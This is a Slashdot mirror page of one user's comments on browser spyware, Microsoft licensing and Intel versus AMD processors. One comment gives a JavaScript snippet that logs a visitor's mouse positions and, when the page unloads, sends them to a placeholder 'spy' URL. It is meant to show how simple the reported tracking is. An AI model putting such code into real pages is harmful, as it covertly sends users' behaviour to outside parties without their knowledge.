Slashdot Mirror


User: flegged

flegged's activity in the archive.

Stories
0
Comments
129
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 129

  1. Re:Is it just me or is the web becoming too annoyi on Browser Spyware: Watching Where You Linger · · Score: 1

    Sorry, been using Java lately.

    s/onMouseMove/onMouseOver/

  2. Re:Is it just me or is the web becoming too annoyi on Browser Spyware: Watching Where You Linger · · Score: 1

    I wonder if it's possible to write an app that uses MS's rendering engine

    Aol.

    Or write one yourself. Seriously. It's well documented. I did one in a half hour. You basically host shdocvw.dll as an ActiveX control within your app, and you can have conplete control over its behaviour.

    Or, if you don't feel so inclined, clickity this : Tools/Internet Options/Security/Custom Level/Scripting/Active Scripting/Disable. Micros~1 were never stupid enough to disable disabling JavaScript. They just left it on by default. You can enable/disbale JavaScript/anything else etc on a site by site basis, by putting them into four security zones, which you can choose the level of security on each.

    The 'breakthrough' nothing more than

    <script>
    var movements = new Array();
    </script>
    <body onMouseMove='movements.push(event.clientX); movements.push(event.clientY);' onUnLoad='window.open"http://some.random.spamhaus/ spy?movements=" + movements'>

  3. Re:but that's the whole point! on Ex-Microsoft Employee On Unix Within The Empire · · Score: 1

    Quick bit of maths here.

    1000 copies of Windows 2000, paid for by the Microsoft department that wants to move to it :$250*1000=$250000
    1000 copies of Windows 2000, paid into sales:£250*1000=$250000.

    Net cost:$250000=$250000=$0.

    As far as I'm aware, $0 means free.

  4. Re:It's about time on Intel Recalls 1.13-GHz P-IIIs Due To Glitch · · Score: 2

    >How long did AMD and Intel think they could keep >on going pushing overclocked POS chips out the >door? The fact is that AMD chips are not overclocked. They're merely able to run at higher speeds. Stably. The Intel chips are not. Their instability problems are the sign of an overclocked core that simply cannot handle the speed. The fact that they run perfectly at 850Mhz proves this. However, the AMD chips are reliable at 1100MHz. Unlike Intel. And they're far cheaper. So guess which processor I'm buying? Clue: doesn't rhyme with 'Dentium Free'.